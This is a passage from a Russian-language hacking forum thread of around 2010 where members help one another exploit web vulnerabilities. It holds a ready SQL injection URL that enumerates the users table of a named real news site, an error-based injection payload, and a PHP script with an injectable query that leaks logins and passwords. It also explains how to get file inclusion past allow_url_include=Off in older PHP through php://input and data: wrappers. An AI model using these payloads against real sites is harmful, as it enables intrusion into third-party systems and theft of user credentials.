Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Код еще раз глянь, расширение берется то, которое пришло: $imagen = $id.".".$extension; //imagename
    Ну да, это я еще с начала попробовал.
    Лол, нет.
     
  2. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    611
    Likes Received:
    117
    Reputations:
    37
    Ну с этим понятно, но почему при таком вводе опять ошибка?
    Или как нужно "хексить" ?
     
  3. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Мдаа, а ты задумывался над тем, что ты написал?)

    Code:
    http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1+--+
     
  4. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    http://ctacok.ru/he.php?c=text2hex
     
  5. re-2

    re-2 New Member

    Joined:
    24 Jun 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    2
    0+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand (0)*2)))

    как работаит ета sql injection?
     
  6. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    G1G, значит прав не хватает, а на FreeBSD 7.2 ты их вряд ли поднимешь.
     
  7. Jerri

    Jerri Level 8

    Joined:
    12 Jul 2009
    Messages:
    137
    Likes Received:
    373
    Reputations:
    22
    Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
    Что сделать можно? :confused:
     
  8. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    611
    Likes Received:
    117
    Reputations:
    37
    Выложи полностью адрес и запрос.
     
  9. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Это вывод в ошибке

    PHP:
    <?PHP
    $db_host 
    'localhost';
    $db_user 'root';
    $db_pass '';
    $db_name 'job';
    $con mysql_connect($db_host,$db_user,$db_pass) or die(mysql_error());
    mysql_selectdb($db_name,$con) or die(mysql_error());

    $q mysql_query("SELECT id,login,password FROM users WHERE id=1 AND login='ctacok' LIKE '%{$_GET['id']}%'") or die(mysql_error());
    $row mysql_fetch_assoc($q);
        echo 
    $row['id'];
        echo 
    $row['login'];
        echo 
    $row['password'];
    ?>
    Просто в чём соль, надо знать имя колонки.
     
    #11809 Ctacok, 14 Mar 2010
    Last edited: 14 Mar 2010
    1 person likes this.
  10. Jerri

    Jerri Level 8

    Joined:
    12 Jul 2009
    Messages:
    137
    Likes Received:
    373
    Reputations:
    22
    Понял,спс.
     
  11. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    Этот хацкер пытается мне доказать,что при allow_url_include off возможно подключить УДАЛЕННЫЙ файл при RFI. Так вот,возможно ли вобще такое? на 99.9% уверен что нет
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    при allow_url_include off вообще не может быть речи об RFI
     
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Ты, видимо, тоже крутой хацкер и не понимаешь, что при таких условиях RFI не может быть, только LFI.
     
  14. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    Я понимаю, имел ввиду код. RFI при allow_url_include on -

    PHP:
    include($_GET['p']);
    например.
    Он сказал что знает как провесты тут RFI при allow_url_include off

    P.S немного неправельно выразился
     
  15. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Откуда такая категоричность? Всё зависит от версии, на каких-то версиях можно легко заинклудить удалённый файл при allow_url_include=Off.
    Универсального PoC у меня нет.
     
    1 person likes this.
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    От версии чего это зависит?
    И пример желательно

    PS Только не тот который в РОА, пожалуйста, а что-нибудь своё
     
  17. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    От версии php. Можем проверить вместе - нужен сервак с ?< версией php <5.2.1.
    Вот смотри: http://bugs.php.net/bug.php?id=35618

    Стало быть, до этой версии инклуд php://input не запрещён => имеем обход ограничений.
     
    3 people like this.
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Угу, сейчас потестил на 5.2.0-8+etch16, работает и php://input и data

    Это конечно не RFI, который я имел ввиду, но всё равно интересно
     
  19. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91
    Вот, я кажется откопал место в исходниках php, где это видно.
    Вот участок в memory.c в 5.2.0:

    Code:
    708	php_stream_wrapper php_stream_rfc2397_wrapper =	{
    709		&php_stream_rfc2397_wops,
    710		NULL,
    711		[color=yellow][b]0[/b], /* is_url */[/color]
    712	};
    А вот тот же участок в 5.2.1:
    Code:
    745	php_stream_wrapper php_stream_rfc2397_wrapper =	{
    746		&php_stream_rfc2397_wops,
    747		NULL,
    748		[color=yellow][b]1[/b], /* is_url */[/color]
    749	};
    А теперь смотрим в исходник streams.c (там нижеследующий код одинаков вроде бы во всех версиях):

    Code:
    1605          if ((wrapperpp && (*wrapperpp)->[color=yellow][b]is_url[/b][/color]) && (!PG(allow_url_fopen) || ((options & STREAM_OPEN_FOR_INCLUDE) && !PG(allow_url_include))) ) {
    1606               if (options & REPORT_ERRORS) {
    1607                    php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in the server configuration");
    1608               }
    1609               return NULL;
    1610          }
    Вот как-то так. Значит в версиях до 5.2.1 RFI будет и с allow_url_include=Off, если использовать php-streams типа php://input. Для data: видимо тоже есть где-то такое определение (насчёт того, is_url он или нет).
    Нижнюю границу версий точно не знаю...
     
    #11819 Root-access, 14 Mar 2010
    Last edited: 14 Mar 2010
    1 person likes this.
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    RFI там не будет. Только обёртки отработают
     
Loading...
Thread Status:
Not open for further replies.